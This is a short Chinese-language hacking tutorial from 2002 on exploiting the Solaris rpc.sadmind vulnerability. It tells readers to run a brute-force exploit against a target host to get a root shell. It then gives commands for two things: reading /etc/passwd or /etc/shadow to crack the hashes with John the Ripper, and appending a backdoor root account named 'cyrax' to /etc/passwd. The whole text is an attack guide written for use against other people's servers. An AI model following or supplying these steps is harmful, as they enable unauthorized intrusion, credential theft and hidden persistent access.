| |
| 漏洞 rpc.sadmind 的利用 漏洞 rpc.sadmind 公布有一段时间了,但是却没有相关的文章介绍它,所以我决定向大家讲讲这个漏洞的使用方法. 首先,我将要提到使用 sadmind 暴力破解器(brute forcer),是利用文件sadmindex-sparc.c 运行暴力破解器(brute forcer): ./sadmind-brute-force 我们必须找到一个有漏洞的服务器(你可以用RPC-scanners LOL 扫描RPC漏洞)来测试. ./sadmind-brute-force 1 www.sadmindvulnhost.com 如果你得到一个 rootshell,那么服务器是有漏洞的,你成功了.否则就是被修补过的. 如果,现在你获得 rootshell 后有2种方法控制主机.(梦:其实是N总方法,第一种可以用;第二种
这是最简单的,查看 /etc/passwd (或者 /etc/shadow )文件,然后用John The Ripper破解它 我们看 /etc/passwd 文件应该是这样的: cat /etc/passwd; " ; "必须加上去!如果你用 cat /etc/passwd,服务器将认为命令是cat /etc/passwd^m 第二种: 这种就很快了.我们加入2个root级别的帐号就可以了.... 假设主机密码 在rootshell中输入 : echo cyrax:x:UID:GID:cyrax:/:/bin/sh >> /etc/passwd; 不要用 > 用成 >>, >> 是加入, > 则是覆盖 !否则,后果惨重!!!! 把例子中的 UID 和 GID 你输入后就有2个帐号了: cyrax 和 cyrax2 你用cyrax帐号登陆,然后 su 成 cyrax2 这个 root 帐号,再设置密码... |
| Copyright By「黑白网络工作室」2002 All Rights Reserve |